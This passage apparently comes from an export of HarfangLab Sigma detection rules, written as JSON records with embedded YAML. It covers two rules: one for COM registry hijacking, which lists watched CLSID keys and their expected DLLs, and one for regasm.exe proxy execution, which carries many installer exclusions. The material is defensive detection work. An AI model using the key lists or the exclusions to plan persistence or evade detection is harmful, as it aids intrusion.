"endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.623666Z", + "creation_date": "2026-03-23T11:45:34.623668Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.623672Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.trellix.com/en-us/about/newsroom/stories/research/prime-ministers-office-compromised.html", + "https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/", 
+ "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", + "https://www.welivesecurity.com/en/eset-research/update-winrar-tools-now-romcom-and-others-exploiting-zero-day-vulnerability/", + "https://github.com/eset/malware-ioc/blob/master/turla/README.adoc", + "https://www.proofpoint.com/us/blog/threat-insight/10-things-i-hate-about-attribution-romcom-vs-transferloader", + "https://attack.mitre.org/techniques/T1546/015/" + ], + "name": "t1546_015_component_object_model_hijacking.yml", + "content": "title: Possible Component Object Model Hijacking\nid: 032b28af-b4ce-4476-a201-8b2896158878\ndescription: |\n Detects the possible hijacking of a Component Object Model (COM) in the registry.\n Attackers can use this method to achieve persistence through an event trigger execution.\n The DLL indicated in the hijacked registry key is then loaded when the corresponding COM is called by the system.\n It is recommended to analyze the specified DLL for malicious content and the process making the registry modification for any other suspicious actions.\nreferences:\n - https://www.trellix.com/en-us/about/newsroom/stories/research/prime-ministers-office-compromised.html\n - https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/\n - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/\n - https://www.welivesecurity.com/en/eset-research/update-winrar-tools-now-romcom-and-others-exploiting-zero-day-vulnerability/\n - https://github.com/eset/malware-ioc/blob/master/turla/README.adoc\n - https://www.proofpoint.com/us/blog/threat-insight/10-things-i-hate-about-attribution-romcom-vs-transferloader\n - https://attack.mitre.org/techniques/T1546/015/\ndate: 2022/09/29\nmodified: 2026/02/02\nauthor: 
HarfangLab\ntags:\n - attack.persistence\n - attack.t1546.015\n - attack.execution\n - attack.t1559.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.Hijacking\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n\n selection_ehstorshell:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D}\\InprocServer32\\(Default)'\n filter_ehstorshell:\n Details: '?:\\Windows\\System32\\EhStorShell.dll'\n\n selection_wmiutils:\n TargetObject:\n - 'HKLM\\SOFTWARE\\Classes\\CLSID\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\InprocServer32\\(Default)' # WbemDefaultPathParser\n - 'HKLM\\SOFTWARE\\Classes\\CLSID\\{EAC8A024-21E2-4523-AD73-A71A0AA2F56A}\\InprocServer32\\(Default)' # WbemQuery\n - 'HKLM\\SOFTWARE\\Classes\\CLSID\\{EB87E1BD-3233-11D2-AEC9-00C04FB68820}\\InprocServer32\\(Default)' # WbemStatusCode\n filter_wmiutils:\n Details: '%systemroot%\\system32\\wbem\\wmiutils.dll'\n\n selection_wmiprvsd:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{4DE225BF-CF59-4CFC-85F7-68B90F185355}\\InprocServer32\\(Default)'\n filter_wmiprvsd:\n Details: '%systemroot%\\system32\\wbem\\wmiprvsd.dll'\n\n selection_wbemsvc:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{7C857801-7381-11CF-884D-00AA004B2E24}\\InprocServer32\\(Default)'\n filter_wbemsvc:\n Details: '%systemroot%\\system32\\wbem\\wbemsvc.dll'\n\n selection_wbemprox:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{4590F811-1D3A-11D0-891F-00AA004B2E24}\\InprocServer32\\(Default)'\n filter_wbemprox:\n Details: '%systemroot%\\system32\\wbem\\wbemprox.dll'\n\n selection_applicationframe:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{DDC05A5A-351A-4E06-8EAF-54EC1BC2DCEA}\\InprocServer32\\(Default)'\n filter_applicationframe:\n Details: '%systemroot%\\system32\\applicationframe.dll'\n\n selection_propsys:\n TargetObject: 
'HKLM\\SOFTWARE\\Classes\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\\InprocServer32\\(Default)'\n filter_propsys:\n Details: '%systemroot%\\system32\\propsys.dll'\n\n selection_actioncenter:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{F56F6FDD-AA9D-4618-A949-C1B91AF43B1A}\\InprocServer32\\(Default)'\n filter_actioncenter:\n Details: '%systemroot%\\system32\\actioncenter.dll'\n\n selection_thumbcache:\n TargetObject: 'HKCU\\SOFTWARE\\Classes\\CLSID\\{2155fee3-2419-4373-b102-6843707eb41f}\\InprocServer32\\(Default)'\n filter_thumbcache:\n Details: '%systemroot%\\system32\\thumbcache.dll'\n\n selection_syncreg:\n TargetObject: 'HKCU\\SOFTWARE\\Classes\\CLSID\\{f82b4ef1-93a9-4dde-8015-f7950a1a6e31}\\InprocServer32\\(Default)'\n filter_syncreg:\n Details: '%systemroot%\\system32\\syncreg.dll'\n\n selection_repdrvfs:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{7998DC37-D3FE-487C-A60A-7701FCC70CC6}\\InprocServer32\\(Default)'\n filter_repdrvfs:\n Details: '?:\\Windows\\system32\\wbem\\repdrvfs.dll'\n\n selection_psfactorybuffer:\n TargetObject:\n - 'HKLM\\SOFTWARE\\Classes\\CLSID\\{1299CF18-C4F5-4B6A-BB0F-2299F0398E27}\\InprocServer32\\(Default)'\n - 'HKLM\\SOFTWARE\\Classes\\CLSID\\{1293C733-3151-48F5-89DE-2457B4AB3FD2}\\InprocServer32\\(Default)'\n filter_psfactorybuffer:\n Details:\n - '?:\\Windows\\System32\\npmproxy.dll'\n - '?:\\Windows\\System32\\daxexec.dll'\n\n selection_sharetaskscheduler:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\\InprocServer32\\(Default)'\n filter_sharetaskscheduler:\n Details: '?:\\Windows\\system32\\windows.storage.dll'\n\n selection_sharingprivate:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{08244EE6-92F0-47F2-9FC9-929BAA2E7235}\\InprocServer32\\(Default)'\n filter_sharingprivate:\n Details: '?:\\Windows\\System32\\ntshrui.dll'\n\n selection_eventsystem:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{4E14FBA2-2E22-11D1-9964-00C04FBBB345}\\InprocServer32\\(Default)'\n 
filter_eventsystem:\n Details: '?:\\Windows\\system32\\es.dll'\n\n selection_msaa:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\\InprocServer32\\(Default)'\n filter_msaa:\n Details: '?:\\Windows\\System32\\oleacc.dll'\n\n selection_autoplay:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{9207D8C7-E7C8-412E-87F8-2E61171BD291}\\InprocServer32\\(Default)'\n filter_autoplay:\n Details: '?:\\Windows\\system32\\shell32.dll'\n\n selection_notificationmanager:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{A3B3C46C-05D8-429B-BF66-87068B4CE563}\\InprocServer32\\(Default)'\n filter_notificationmanager:\n Details: '?:\\Windows\\System32\\actioncenter.dll'\n\n selection_commonplaces:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{0997898B-0713-11D2-A4AA-00C04F8EEB3E}\\InprocServer32\\(Default)'\n filter_commonplaces:\n Details: '?:\\Windows\\System32\\windows.storage.dll'\n\n selection_identitystore:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{30d49246-d217-465f-b00b-ac9ddd652eb7}\\InprocServer32\\(Default)'\n filter_identitystore:\n Details: '?:\\Windows\\System32\\IDStore.dll'\n\n selection_unexpectedshutdownreason:\n TargetObject|endswith: '\\CLSID\\{68DDBB56-9D1D-4FD9-89C5-C0DA2A625392}\\InProcServer32\\(Default)'\n filter_unexpectedshutdownreason:\n Details: '%SystemRoot%\\system32\\stobject.dll'\n\n selection_printers:\n TargetObject|endswith: '\\CLSID\\{2227A280-3AEA-1069-A2DE-08002B30309D}\\InProcServer32\\(Default)'\n filter_printers:\n Details: '%SystemRoot%\\system32\\prnfldr.dll'\n\n condition: selection and (\n (selection_ehstorshell and not filter_ehstorshell) or\n (selection_wmiutils and not filter_wmiutils) or\n (selection_wmiprvsd and not filter_wmiprvsd) or\n (selection_wbemsvc and not filter_wbemsvc) or\n (selection_wbemprox and not filter_wbemprox) or\n (selection_applicationframe and not filter_applicationframe) or\n (selection_propsys and not filter_propsys) or\n (selection_actioncenter and not 
filter_actioncenter) or\n (selection_thumbcache and not filter_thumbcache) or\n (selection_syncreg and not filter_syncreg) or\n (selection_repdrvfs and not filter_repdrvfs) or\n (selection_psfactorybuffer and not filter_psfactorybuffer) or\n (selection_sharetaskscheduler and not filter_sharetaskscheduler) or\n (selection_sharingprivate and not filter_sharingprivate) or\n (selection_eventsystem and not filter_eventsystem) or\n (selection_msaa and not filter_msaa) or\n (selection_autoplay and not filter_autoplay) or\n (selection_notificationmanager and not filter_notificationmanager) or\n (selection_commonplaces and not filter_commonplaces) or\n (selection_identitystore and not filter_identitystore) or\n (selection_unexpectedshutdownreason and not filter_unexpectedshutdownreason) or\n (selection_printers and not filter_printers)\n )\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "032b28af-b4ce-4476-a201-8b2896158878", + "rule_name": "Possible Component Object Model Hijacking", + "rule_description": "Detects the possible hijacking of a Component Object Model (COM) in the registry.\nAttackers can use this method to achieve persistence through an event trigger execution.\nThe DLL indicated in the hijacked registry key is then loaded when the corresponding COM is called by the system.\nIt is recommended to analyze the specified DLL for malicious content and the process making the registry modification for any other suspicious actions.\n", + "rule_creation_date": "2022-09-29", + "rule_modified_date": "2026-02-02", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.execution", + "attack.persistence" + ], + "rule_technique_tags": [ + "attack.t1546.015", + "attack.t1559.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0363e1f9-7a85-414e-a37a-5ce7993e7db4", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "weak", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.080770Z", + "creation_date": "2026-03-23T11:45:34.080773Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.080777Z", + "rule_level": "medium", + "rule_confidence": "weak", + "rule_confidence_override": null, + "references": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regasm/", + "https://attack.mitre.org/techniques/T1218/009/" + ], + "name": "t1218_009_regasm_dll_load.yml", + "content": "title: Suspicious Proxy Execution via regasm.exe\nid: 0363e1f9-7a85-414e-a37a-5ce7993e7db4\ndescription: |\n Detects the execution of the legitimate Windows binary RegAsm.exe, used to register .NET COM assemblies.\n This may be used by attackers to load their .DLL files. 
By default, RegAsm calls the DLL's exported \"[Un]RegisterClass\" function.\n AWL (Application Whitelist) is a list of applications and application components that are authorized for use in an organization.\n Application whitelisting technologies use whitelists to control which applications are permitted to execute on a host.\n This can also be used by program installers in Windows.\n It is recommended to analyze the parent process as well as actions taken by RegAsm.exe to determine the legitimacy of this action.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Regasm/\n - https://attack.mitre.org/techniques/T1218/009/\ndate: 2023/01/04\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.009\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Regasm\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\regasm.exe'\n OriginalFileName: 'regasm.exe'\n\n filter_directory:\n CommandLine|contains:\n - ' ?:\\Program Files\\'\n - ' ?:\\Program Files (x86)\\'\n - ' ?:\\PROGRA~2\\'\n - ' ?:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\'\n - ' ?:\\Windows\\Microsoft.Net\\assembly\\GAC_32\\'\n\n exclusion_pdf_creator:\n ParentCommandLine|contains: 'PDFCreator-*_*_*-setup.tmp'\n\n exclusion_installers:\n ParentImage|endswith: '\\MsiExec.exe'\n ParentCommandLine|contains:\n - '-Embedding'\n - '/V'\n - '-V'\n CommandLine|contains:\n # SOLIDWORKS 3D Modelling\n - '?:\\ProgramData\\SOLIDWORKS\\SOLIDWORKS CAM\\MATLIBx64\\ '\n # Microsoft CCM\n - 'Microsoft.ConfigurationManagement.SensorFramework.dll'\n - 'Microsoft.ConfigurationManager.SensorManagedProvider.dll'\n # Altova Script Editor\n - 'AltovaScriptFormEditorHost*.dll'\n # Oskab 3D\n - 'Oskab3D.SDB.dll'\n # MicroStrategy Office Plugin\n - '/tlb:moimain.tlb moimain.dll'\n - 'regasm.exe 
/nologo /tlb ?:\\WINDOWS\\\\Microsoft.NET\\assembly\\gac_MSIL\\Tekla.Structures.Model\\\\*\\Tekla.Structures.Model.dll'\n - 'regasm.exe /nologo /tlb ?:\\WINDOWS\\\\Microsoft.NET\\assembly\\gac_MSIL\\tekla.structures\\\\*\\tekla.structures.dll'\n - '?:\\programdata\\service advisor\\cal\\connectivity applications\\support\\regasm.exe*'\n - '?:\\program files\\bruker\\nanoscopeanalysis\\regasm.exe /s nanoscopeanalysis.exe /tlb:hostapplication.tlb'\n - '?:\\program files (x86)\\bl\\bl\\\\*\\\\*\\regasm.exe*'\n - '*\\siga.softwareactivation\\dev\\siga.softwareactivation.application\\siga.softwareactivation.comwrapperspw\\bin\\release\\regasm.exe *\\siga.softwareactivation\\dev\\siga.softwareactivation.application\\siga.softwareactivation.comwrapperspw\\bin\\release\\siga.softwareactivation.comwrapperspw.???'\n - '*\\regasm.exe /codebase *\\smsappl\\assemblies\\observationmetier.dll'\n - '?:\\users\\\\*\\temp\\is-*.tmp\\regasm.exe /s /* /tlb ?:\\users\\\\*\\temp\\is-*.tmp\\innosetuptools.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\intunecontentmanager\\microsoft.configurationmanager.intunecontentmanager.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\microsoft.configurationmanager.azuremanagement.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\microsoft.configurationmanager.cloudbase.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\wsusmsp.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /codebase bullzip.pdfwriter*'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /codebase contextmenuhandler64.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /codebase ie11cloudmetering.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /codebase pdf7.pdfwriter*'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe ?:\\windows\\system32\\dolbyaposvc\\dax3apidll.dll'\n - 
'?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\commvault\\contentstore\\base*'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe datev.crystalreports.x64bridge.dll /tlb /nologo'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\microsoft.configurationmanager.*'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\microsoft.configurationmanagement.*'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\bin\\x64\\wsusmsp.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\bin\\x64\\wsyncact.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\sms_srsrp\\srsserver.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\sms_srsrp\\srsserver.dll /unregister'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\commvault\\base\\\\*'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe edisys.iulm.*.dll*'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\esprit.agievision_pages.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\esprit.charmillestechnologymanager.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\esprit.optionsconfiguration.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\esprit.threaddatabase.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\esprit.threadlayer.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /register /s cgm.axilibraries.interop.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe */silent* *\\programs\\sap businessobjects\\epm add-in\\epmofficeactivex.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe stellarexcel.dll /tlb:com.stellarexcel.tlb /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /tlb /codebase robotconnectionaddin.dll'\n - 
'?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe tsprintdvc64.dll /unregister'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe tsscandvc64.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe tsscandvc64.dll /unregister'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /u contextmenuhandler64.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /u ?:/program files/common files/wondershare/pdfelement??/preview/*/pepreview?.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\\\regasm.exe /unregister ?:/program files/atempo/tina/bin/libtina_comps_clr4.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\becpwin\\gfxgateway*.dll /regfile:*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\coalaclient\\gatewaycs.dll /tlb:*\\coalaclient\\gatewaycs.tlb'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\revao\\exe\\eic.global.interop.dll*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\masslynx\\acquitywrapper.dll /silent /unregister'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /codebase seedkey*.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe ?:\\windows\\system32\\farpoint.spread8.excel2007.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm /* *\\opentrust\\fncopentrust.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm /* *\\dll\\allegoria\\classfncallegoria.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm /* *\\dll\\converttopdf\\fiducial.notaire.compta.rao.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm /* *\\dll\\fiducialwrappermailboxplanete\\fiducial.wrappermailboxplanetecompta.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm /* *\\dll\\fnc_scan\\fnc_scan.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm /* *\\ifiducial_fnc.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm /* *\\wrapper_clotureaffaire.dll'\n - 
'?:\\windows\\microsoft.net\\framework\\\\*\\regasm *\\ceniber\\autonet\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\diamic\\bin\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe cls_cashdrawer.dll /tlb:cls_cashdrawer.tlb /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe cls_cfd.dll /tlb:cls_cfd.tlb /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe cls_depileuraures.dll /tlb:cls_depileuraures.tlb /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe cls_print.dll /tlb:cls_print.tlb /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /codebase /silent *\\dedalus\\meds\\soins\\v7\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /codebase /tlb fiducial.rao.wordaddin.interop.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\batigestconnect\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\sage-paie\\declarations sociales\\client\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe ?:\\windows\\syswow64\\b1crufl.dll /register /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe ?:\\windows\\syswow64\\sagelcp.dll /s /nolog /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\winnot.200\\assemblies\\fiducial.winnotaires.*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\winnot.200\\assemblies\\lexisnexis.winnotaires.*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\coloris\\activex\\interfacecoffrefort\\cosolucecoffrefortclient.dll*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe ecs2000.*.dll*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\paie\\sagepaie\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /nologo *\\salarior\\bus_bl\\pes\\bl.sante.interop.iparapheur.*.dll*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /nologo /verbose 
*?:\\windows\\syswow64\\dcsmmclib.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /nologo /verbose *?:\\windows\\syswow64\\dcstraceconsole.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /silent ?:\\windows\\syswow64\\annoterpdf2.dll tlb ?:\\windows\\syswow64\\annoterpdf2.tlb /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /silent impac.mosaiq.charting.documents.mergefields.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe stange.*.dll*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\\\regasm.exe stinterfaces.dll /codebase /tlb:?:\\program files (x86)\\philips\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /tlb /codebase *\\pacom.gms.extendedconfiguration.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /tlb /codebase *\\indraworks ds\\indraworks.drive.drivetextserver.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /tlb /codebase *\\indraworks ds\\indraworks.utilities.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /u *\\kansysedge\\rmp\\bin\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm fiducial.transim.comstarter.dll /codebase /tlb'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm interop.msutil.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm interop.msutil.dll /unregister'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm jdsu.fit.fiberchek.automation.dll /codebase'\n - '?:\\WINDOWS\\Microsoft.NET\\Framework*\\\\*\\regasm.exe /silent /codebase ?:\\ProgramData\\SOLIDWORKS\\\\*'\n\n exclusion_legitimate_grandparent:\n ProcessGrandparentCommandLine:\n # Ignore shares as they may often host legitimate installers\n - '\\\\\\\\*\\\\*'\n # SCCM\n - '?:\\Windows\\ccmcache\\\\*'\n # Legitimate apps\n - '?:\\Becpwin\\\\*'\n - '*\\Cosoluce\\bigjim\\Supernova.Client.BigJim.Service.exe'\n - '?:\\Windows\\Temp\\MW-????????-????-????-????-????????????\\setup_QBloc_*.exe'\n - 
'?:\\ProgramData\\Edisys\\SPIGAO\\iulm\\SPIGAOConnect_Setup-PROD.exe'\n\n exclusion_innosetuptools:\n CommandLine:\n - '*\\RegAsm.exe /s /codebase /tlb ?:\\Users\\\\*\\AppData\\Local\\Temp\\is-?????.tmp\\InnoSetupTools.dll'\n - '*\\RegAsm.exe /s /codebase /tlb ?:\\WINDOWS\\TEMP\\is-?????.tmp\\InnoSetupTools.dll'\n - '*\\RegAsm.exe /s /u ?:\\Users\\\\*\\AppData\\Local\\Temp\\is-?????.tmp\\InnoSetupTools.dll'\n - '*\\RegAsm.exe /s /u ?:\\WINDOWS\\TEMP\\is-?????.tmp\\InnoSetupTools.dll'\n\n exclusion_lenovo:\n CommandLine:\n - '*\\RegAsm.exe /silent*?:\\ProgramData\\Lenovo\\ImController\\Plugins\\LenovoBatteryGaugePackage\\\\*\\PluginsContract.dll'\n - '*\\RegAsm.exe /silent*?:\\ProgramData\\Lenovo\\Vantage\\Addins\\LenovoBatteryGaugeAddin\\\\*\\PluginsContract.dll'\n\n exclusion_archimed_docmaker:\n ParentImage|endswith: '\\ArchimedDocMakerRegister.exe'\n CommandLine|contains: 'Achimed.DocMaker*.dll'\n\n exclusion_solu_qiq:\n ParentImage|endswith: '\\SOLU-QIQ Base *.*.*.exe'\n CommandLine|contains:\n - 'Convertisseur.dll'\n - 'ADAuthentication.dll'\n\n exclusion_wrapper_webview:\n ParentImage|endswith: 'WrapperWebView2.exe'\n ParentCommandLine|contains: '/ACTION=INSTALL'\n CommandLine|contains:\n - 'Microsoft.Web.WebView2.WinForms.tlb'\n - 'Microsoft.Web.WebView2.Core.tlb'\n\n exclusion_bat_emc:\n ParentImage|endswith: 'Setup_BAT-EMC_*.*.*.*.exe'\n CommandLine|contains:\n - 'VisuMonitoring.dll'\n - 'BatEmcBridge.dll'\n - 'SpectrogramActiveX.dll'\n\n exclusion_ivanti:\n ParentImage|endswith: '\\Ivanti20??-*\\Setup.exe'\n CommandLine|contains: 'Interop.ComUtilitiesLib.dll'\n\n exclusion_inot_office:\n ParentImage|endswith:\n - '\\GenApi.iNot.RegisterCOMComponants.exe'\n - '\\GenApi.CTI.Launcher.exe'\n CommandLine|contains:\n - '\\GenApi.iNot.Client.FramePlayer.DLL'\n - '\\GenApi.CTI.Data.iNot.dll'\n\n exclusion_fiducial:\n GrandparentImage|endswith:\n - '\\majfuposte.exe'\n - 'fncgf_evaluationprivilege.exe'\n ParentCommandLine|contains: 
'\\AppData\\Roaming\\fiducial\\compta\\'\n\n exclusion_water_ics:\n GrandparentImage|endswith: 'Waters\\ICS\\Companion\\ICSCompanionSvc.exe'\n ParentImage|endswith: 'Waters\\ICS\\Companion\\SetupHelper.exe'\n CommandLine|endswith: 'Waters.*.*.dll'\n\n exclusion_dolby:\n GrandparentImage|endswith: '\\DAX3API.EXE'\n ParentCommandLine|endswith: '\\DAX3APIDLL.dll'\n\n exclusion_mosaiq:\n GrandparentImage|endswith: '\\SetupMosaiq.tmp'\n ParentImage|endswith: '\\RegisterAssemblies.exe'\n\n exclusion_sage1:\n - GrandparentImage|endswith:\n - '\\Sagedirect.exe'\n - '\\SageDS_*_*_*.exe'\n - ParentCommandLine|contains:\n - '\\SageDS\\Client\\InstallShieldEnregistrementCOM.bat'\n - 'Sagedirect*.exe'\n exclusion_sage2:\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'SAGE SAS'\n\n exclusion_common_dlls:\n CommandLine|contains:\n - 'GenApi.iNot.*.*.dll'\n - 'GdPicture.NET.*.dll'\n\n exclusion_sap_se:\n ParentImage|endswith: '\\NwSapSetup.exe'\n CommandLine|contains:\n - 'sapnco.dll'\n - 'rscp4n.dll'\n\n exclusion_atempo:\n ParentImage: '?:\\Program Files\\Atempo\\TimeNavigator\\\\*\\Bin\\tina_*.exe'\n\n exclusion_philips:\n ParentImage:\n - '?:\\Program Files\\Philips\\CIS\\Bin\\Philips.CIS.MachineSetup.exe'\n - '?:\\Program Files 